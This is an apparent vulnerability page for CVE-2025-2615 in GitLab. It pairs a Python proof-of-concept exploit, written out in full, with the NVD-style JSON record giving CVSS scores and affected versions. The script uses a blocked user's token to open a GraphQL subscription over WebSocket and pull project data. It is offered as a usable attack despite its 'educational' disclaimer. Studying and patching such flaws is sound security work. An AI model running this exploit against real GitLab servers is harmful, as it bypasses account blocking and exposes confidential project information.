CVE-2025-2615

#!/usr/bin/env python3 """ CVE-2025-2615 PoC - GitLab Blocked User GraphQL Subscription Bypass Note: This PoC is for educational and authorized testing purposes only. """ import asyncio import websockets import json import base64 async def exploit_gitlab_graphql_subscription(gitlab_url, blocked_token): """ PoC for exploiting blocked user GraphQL subscription via WebSocket """ ws_url = gitlab_url.replace("https://", "wss://").replace("http://", "ws://") ws_url += "/-/graphql-explorer" headers = { "Authorization": f"Bearer {blocked_token}", "Sec-WebSocket-Protocol": "graphql-ws" } try: async with websockets.connect(ws_url, extra_headers=headers) as ws: # Step 1: Initialize connection with 'connection_init' init_message = { "type": "connection_init", "payload": { "authorization": f"Bearer {blocked_token}" } } await ws.send(json.dumps(init_message)) # Step 2: Receive connection_ack response = await ws.recv() print(f"[+] Connection response: {response}") # Step 3: Subscribe to sensitive data subscribe_message = { "id": "sensitive-data-sub", "type": "subscribe", "payload": { "query": "subscription { project(fullPath: \"sensitive-project\") { id name } }", "variables": {} } } await ws.send(json.dumps(subscribe_message)) # Step 4: Receive subscription data (if vulnerable) print("[+] Waiting for subscription data...") for _ in range(5): data = await asyncio.wait_for(ws.recv(), timeout=10) print(f"[+] Received: {data}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 3: print("Usage: python3 cve_2025_2615_poc.py <gitlab_url> <blocked_user_token>") sys.exit(1) asyncio.run(exploit_gitlab_graphql_subscription(sys.argv[1], sys.argv[2]))

{"cve": {"id": "CVE-2025-2615", "sourceIdentifier": "[email protected]", "published": "2025-11-15T08:15:45.820", "lastModified": "2025-11-19T17:46:27.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.7 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2, that could have allowed a blocked user to access sensitive information by establishing GraphQL subscriptions through WebSocket connections."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "16.7.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "3A389C8A-1460-43EC-9B93-2FEE62D6ABF1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.7.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "54B0B363-735C-4D9C-B775-BFAD2B28145B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "36824F52-C9A0-4FB3-91F3-05593E3551E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "7E85D20B-EEE1-4CC9-B50A-4040972287D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/526360", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3049150", "source": "[email protected]", "tags": ["Permissions Required"]}]}}